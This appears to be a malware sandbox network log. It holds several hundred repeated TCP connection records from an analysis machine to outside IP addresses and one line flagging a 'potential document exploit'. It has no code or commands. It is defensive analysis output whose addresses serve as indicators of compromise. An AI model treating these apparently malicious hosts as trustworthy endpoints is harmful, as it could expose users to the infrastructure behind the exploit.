Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
